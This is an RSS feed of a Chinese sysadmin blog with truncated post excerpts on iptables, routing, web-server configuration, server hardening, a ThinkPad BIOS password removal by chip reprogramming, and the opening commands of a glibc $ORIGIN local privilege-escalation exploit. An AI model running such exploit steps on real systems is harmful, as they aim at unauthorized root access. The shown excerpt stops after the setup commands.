<![CDATA[王健宇's BLOG]]> http://www.9170.org/ zh-cn www.emlog.net 联想R61 BIOS密码终于破掉了 http://www.9170.org/post-415.html 昨天我们这的芯片级维护店开了,我就把前段时间刷bios,电池放电恢复bios设置都没破掉的bios密码拿去弄了。

花了我150啊。。

过程是这样的,我拿去以后那个师傅没有thinkpad r61的主板图纸还有bios程序,虽然有编程器,但是怕把我的本本弄坏了,不愿意弄了。我让他把主板拆下来看看,那个师傅找到了那块密码芯片以后用风枪把芯片吹了下来,然后吹在编程器上用编程器找到网上的密码程序编程,再接上主...

阅读全文>>]]> Tue, 31 Jan 2012 05:14:52 +0000 王健宇 http://www.9170.org/post-415.html 2012新的想法 http://www.9170.org/post-414.html 新的一年里有新的想法,通常我们在对服务器的要求方面是比较高的,硬件的稳定性,后台处理速度,网络传输速度,安全性,节能等。

最近接触安卓智能手机和软路由比较多,我突然想到一点,什么时候手机的硬件平台会成为X86呢?那样一个小巧的手机加上内存卡,完完全全可以成为一个既节能,又稳定的服务器。

首先以现在来看,安卓智能手机由于是linux内核,在root以后使用终端完全可以安装一个操作系统来运行,现在已经有人...

阅读全文>>]]> Mon, 23 Jan 2012 08:39:00 +0000 王健宇 http://www.9170.org/post-414.html 2012!说说最近发生的事 http://www.9170.org/post-413.html 十二月二十七,高高兴兴买了个二手笔记本联想thinkpad R61,重装了系统,需要用的软件也装好了,备份也做好了,就想去设置一下BIOS,结果发现要密码。把机子拆开,电池放电以后开机提示已经还原默认设置了,正得意着忽然开机出现了密码验证框,顿时傻眼了。各种启动引导方式都不行,无论按F1进BIOS还是按F12选择引导项目还是什么都不按都会先出现这个密码验证。我无语了,就百度了一下万能密码来测试,结...

阅读全文>>]]> Sun, 22 Jan 2012 09:08:59 +0000 王健宇 http://www.9170.org/post-413.html IPTABLES常用规则 http://www.9170.org/post-412.html #!/bin/sh #外网网卡 EXT_IF="eth0" FW_IP="61.137.85.21" #内网网卡 INT_IF="eth1" LAN_IP="192.168.0.1" LAN_IP_RANGE="192.168.0.0/255.255.255.0" #加载模块,一般已内建 #Module loading. #echo "modprobe m... 阅读全文>>]]> Mon, 16 Jan 2012 10:34:00 +0000 王健宇 http://www.9170.org/post-412.html linux 双线策略路由 http://www.9170.org/post-411.html 在/etc/iproute2/rt_tables里建2个table
251 tel
252 cnc
然后给这2个table加规则
ip rule add from 122.227.173.12 table tel         
ip rule add from 60.12.21.139 table...
阅读全文>>]]> Mon, 16 Jan 2012 10:32:17 +0000 王健宇 http://www.9170.org/post-411.html GNU glibc动态连接器$ORIGIN本地权限提升漏洞 http://www.9170.org/post-410.html root下添加一个testuser1帐户
设置密码
su testuser1
cd ~
mkdir -p /tmp/ex1
ln /bin/ping /tmp/ex1/target
exec 3< /tmp/ex1/target
rm -rf /tmp/ex1
再执行
ls -l /proc/$$/fd/3
显示
lr-x------ 1 testuser1 testuser1 64 Dec ...
阅读全文>>]]> Mon, 16 Jan 2012 10:30:50 +0000 王健宇 http://www.9170.org/post-410.html shell结合iptables自动处理攻击 http://www.9170.org/post-409.html

#!/bin/sh
cd /usr/local/nginx/logs
tail access.log -n 1000 |grep vote.php |awk {'print $2'} |sort |uniq -c |sort -nr |awk '{if ($2!=null && $1>50) {print $2}}' > drop_ip.txt
fo...

阅读全文>>]]> Mon, 16 Jan 2012 10:30:25 +0000 王健宇 http://www.9170.org/post-409.html Nginx apache rewrite 对比 http://www.9170.org/post-408.html [APACHE]
RewriteRule ^mergenotify-([0-9]+).html$ index.php?app=mergenotify&order_id=$1 [L]
 
[Nginx]
rewrite ^/mergenotify-([0-9]+).html$ /index.php?app=mergenotify&order_id=$1 last;

 

阅读全文>>]]> Mon, 16 Jan 2012 10:30:07 +0000 王健宇 http://www.9170.org/post-408.html Linux 服务器安全配置 http://www.9170.org/post-407.html Linux 服务器安全配置
--------------------------------------------------------------------------------
第一部分:RedHat Linux篇
1.概述
Linux服务器版本:RedHat Linux AS
对于开放式的操作系统---Linux,系统的安全设定包括系统服务最小化、限制远程存取、隐藏重要资料、修补安...
阅读全文>>]]> Mon, 16 Jan 2012 10:24:49 +0000 王健宇 http://www.9170.org/post-407.html Apache多站点分用户权限设置 http://www.9170.org/post-406.html

分享下apache的每个站单独分配一个用户,先假设下,系统 /data 目录下 有www.abc.comwww.bbs.com ,要实现的目的就是比如www.abc.com被入侵,入侵者看不到并且修改不了www.bbs.com站内的文件。www.abc.om 用abc用户,www.bbs.com用bbs用户。

apache装完都有www-data用户www-data用户组,所以网站都是以这个用户...

阅读全文>>]]> Mon, 16 Jan 2012 10:15:57 +0000 王健宇 http://www.9170.org/post-406.html